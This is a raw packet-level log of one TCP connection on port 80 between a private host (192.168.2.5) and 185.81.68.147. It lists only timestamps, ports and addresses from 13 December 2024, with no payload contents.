Dec 13, 2024 01:37:13.755785942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.755842924 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.756067038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.756197929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.756253958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.756983995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.757313967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.757369995 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.757402897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.758214951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.758260012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.758327007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.759180069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.759222984 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.759268045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.760035992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.760091066 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.760142088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.760934114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.760977983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.761023045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.761873960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.761917114 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.762048960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.762798071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.762846947 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.762867928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.763688087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.763734102 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.763782024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.764615059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.764657974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.764702082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.765500069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.765549898 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.765604973 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.766422033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.766515970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.766547918 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.767328024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.767379999 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.767425060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.768234015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.768284082 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.768328905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.769123077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.769165993 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.769232988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.770064116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.770107031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.770149946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.771028996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.771074057 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.771087885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.771855116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.771895885 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.772042036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.772792101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.772833109 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.772866011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.773685932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.773727894 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.773771048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.774589062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.774633884 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.774714947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.775538921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.775582075 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.775676012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.776403904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.776443958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.776520014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.777359009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.777400970 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.777430058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.778242111 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.778280020 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.778352022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.779136896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.779176950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.779257059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.780071974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.780112982 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.780147076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.780983925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.781025887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.781055927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.781857014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.781929016 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.781965971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.782766104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.782807112 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.782854080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.783698082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.783742905 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.783797026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.784615040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.784658909 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.784688950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.785511971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.785558939 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.785653114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.786446095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.786494017 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.786524057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.787348032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.787400007 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.787470102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.788233995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.788285017 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.788361073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.789161921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.789251089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.789277077 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.790062904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.790108919 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.790183067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.790966034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.791044950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.791069984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.791873932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.791941881 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.791982889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.792782068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.792855024 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.792931080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.793692112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.793737888 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.793782949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.794624090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.794657946 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.794683933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.795516014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.795564890 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.795614958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.796436071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.796480894 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.796571016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.797333956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.797379971 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.797425032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.798228025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.798273087 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.798346996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.799154997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.799201965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.799231052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.800059080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.800106049 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.800148010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.800988913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.801032066 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.801078081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.801855087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.801903009 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.801980019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.802788973 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.802839041 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.802856922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.848453045 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.947786093 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.947885990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.948021889 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.948188066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.948340893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.948405981 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.949095011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.949217081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.949342012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.950031996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.950138092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.950249910 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.950917006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.951026917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.951081038 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.951832056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.951956987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.952482939 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.952756882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.952791929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.952863932 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.953636885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.953758001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.953819990 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.954551935 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.954667091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.955319881 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.955460072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.955565929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.955646038 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.956350088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.956464052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.956749916 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.957320929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.957437038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.957607985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.958338976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.958440065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.958498001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.959122896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.959281921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.959748030 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.960030079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.960169077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.960222006 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.960933924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.961047888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.961236000 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.961849928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.961994886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.962176085 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.962728024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.962838888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.962886095 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.963649035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.963768959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.964194059 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.964611053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.964687109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.964742899 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.965497017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.965643883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.966305017 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.966387987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.966559887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.966605902 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.967277050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.967406034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.968063116 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.968221903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.968380928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.968430996 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.969103098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.969209909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.969827890 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.970002890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.970125914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.970174074 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.970942974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.971072912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.971596956 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.971849918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.971976995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.972035885 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.972728014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.972840071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.973381996 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.973680019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.973790884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.973839045 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.974553108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.974690914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.975173950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.975521088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.975699902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.975783110 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.976403952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.976506948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.976739883 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.977304935 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.977471113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.977526903 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.978236914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.978576899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.978629112 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.979119062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.979232073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.979290009 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.980031967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.980130911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.980253935 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.980925083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.981053114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.981111050 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.981848955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.982018948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.982114077 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.982727051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.982861042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.982928991 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.983661890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.983767033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.983911991 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.984555960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.984672070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.984731913 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.985455036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.985584021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.985702991 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.986381054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.986486912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.986623049 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.987292051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.987397909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.987488031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.988226891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.988300085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.988357067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.989131927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.989217043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.989370108 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.990020037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.990159988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.990328074 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.990953922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.991048098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.991110086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.991854906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.991969109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.992152929 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.992738962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.992789030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.992854118 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.993680000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.993828058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.993890047 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.994586945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.994674921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.995179892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.995470047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.035913944 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.139760017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.139790058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.139910936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.140117884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.140224934 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.140741110 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.141041040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.141144037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.141707897 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.141936064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.142081022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.142143965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.142852068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.142956972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.143354893 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.143755913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.143872023 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.143928051 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.144663095 CET	80	49707	185.81.68.147	192.168.2.5
